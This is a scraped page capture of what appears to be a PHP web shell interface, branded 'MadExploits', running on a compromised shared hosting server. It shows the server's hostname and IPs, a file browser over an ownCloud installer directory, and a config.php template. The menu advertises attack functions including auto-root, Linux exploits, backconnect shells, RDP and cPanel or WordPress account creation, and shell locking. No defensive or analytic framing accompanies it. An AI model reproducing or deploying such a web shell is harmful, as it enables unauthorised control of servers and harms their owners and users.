Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.7
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
owncloud /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
3.43
KB
-rw-r--r--
PasswordHash.php
6.67
KB
-rw-r--r--
_.htaccess
315
B
-rw-r--r--
changelog.txt
6.96
KB
-rw-r--r--
check_suphp.php
101
B
-rw-r--r--
clone.php
5.13
KB
-rw-r--r--
config.php
917
B
-rw-r--r--
data.zip
795
B
-rw-r--r--
edit.php
4.8
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
269
B
-rw-r--r--
import.php
3.88
KB
-rw-r--r--
info.xml
3.54
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
11.21
KB
-rw-r--r--
install.xml
2.5
KB
-rw-r--r--
md5
3.32
KB
-rw-r--r--
notes.txt
1.83
KB
-rw-r--r--
owncloud.sql
43.01
KB
-rw-r--r--
owncloud.zip
97.9
MB
-rw-r--r--
restore.php
2.84
KB
-rw-r--r--
update_pass.php
6.64
KB
-rw-r--r--
upgrade.php
5.75
KB
-rw-r--r--
upgrade.xml
330
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php $CONFIG = array ( 'instanceid' => '[[instanceid]]', 'passwordsalt' => '[[passwordsalt]]', 'secret' => '[[secret]]', 'trusted_domains' => array ( 0 => '[[domhost]]', ), 'datadirectory' => '[[softdatadir]]', 'overwrite.cli.url' => '[[softurl]]', 'dbtype' => 'mysql', 'version' => '10.15.2.0', 'dbname' => '[[softdb]]', 'dbconnectionstring' => '', 'dbhost' => '[[softdbhost]]', 'dbtableprefix' => 'oc_', 'mysql.utf8mb4' => true, 'dbuser' => '[[softdbuser]]', 'dbpassword' => '[[softdbpass]]', 'allow_user_to_change_mail_address' => '', 'logtimezone' => 'UTC', 'apps_paths' => array ( 0 => array ( 'path' => '[[softpath]]/apps', 'url' => '/apps', 'writable' => false, ), 1 => array ( 'path' => '[[softpath]]/apps-external', 'url' => '/apps-external', 'writable' => true, ), ), 'installed' => true, );
Close